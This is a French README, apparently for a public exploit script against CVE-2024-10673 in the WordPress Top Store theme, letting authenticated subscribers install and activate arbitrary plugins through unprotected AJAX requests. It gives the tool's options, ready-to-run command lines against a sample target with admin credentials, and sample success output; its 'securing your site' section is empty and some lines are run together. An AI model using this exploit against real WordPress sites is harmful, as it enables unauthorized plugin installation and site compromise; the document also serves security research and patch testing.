
Top Store <= 1.5.4 - Installation/Activation arbitraire de plugin authentifiée (Abonné+)
Ce script exploite CVE-2024-10673, une vulnérabilité critique présente dans le thème WordPress Top Store (<= 1.5.4). Cette faille permet à des utilisateurs authentifiés disposant d’un accès de niveau abonné ou supérieur d’installer et d’activer des plugins arbitraires via des requêtes AJAX non protégées.
nonce requis.themes.php?page=thunk_started.hunk-companion ou un plugin défini par l’utilisateur).usage: u.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit CVE-2024-10673 - WordPress Plugin Installation & Activation by : # By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)
-un USERNAME, --username USERNAME
WordPress Username
-p PASSWORD, --password PASSWORD
WordPress Password
-pl PLUGIN, --plugin PLUGIN
Plugin slug to install and activate (default: hunk-companion)
hunk-companion) :
python exploit.py -u http://192.168.100.74:888/wordpress -un admin -p admin
woocommerce) :
python CVE-2024-10673.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl woocommerce
{"Logged in successfully"}
{"Fetching nonce value..."}
{"Nonce extracted": "abc123"}
{"Installing plugin: woocommerce..."}
{"Plugin woocommerce installed successfully"}
{"Activating plugin: woocommerce..."}
{"Plugin woocommerce activated successfully"}
{"Exploit completed successfully!"}
Pour sécuriser votre site WordPress :
Ce script est uniquement destiné à des fins éducatives et de recherche en sécurité. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n’avez pas explicitement l’autorisation de tester est illégale. Utilisez-le de manière responsable !
Par : Khaled Alenazi (Nxploit)